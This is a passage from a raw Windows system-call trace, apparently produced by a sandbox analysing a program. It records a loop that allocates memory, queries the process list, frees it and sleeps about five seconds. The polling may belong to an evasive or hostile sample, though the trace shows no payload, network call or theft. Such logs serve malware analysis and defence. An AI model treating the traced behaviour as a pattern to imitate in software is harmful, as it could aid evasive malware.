Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.057] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 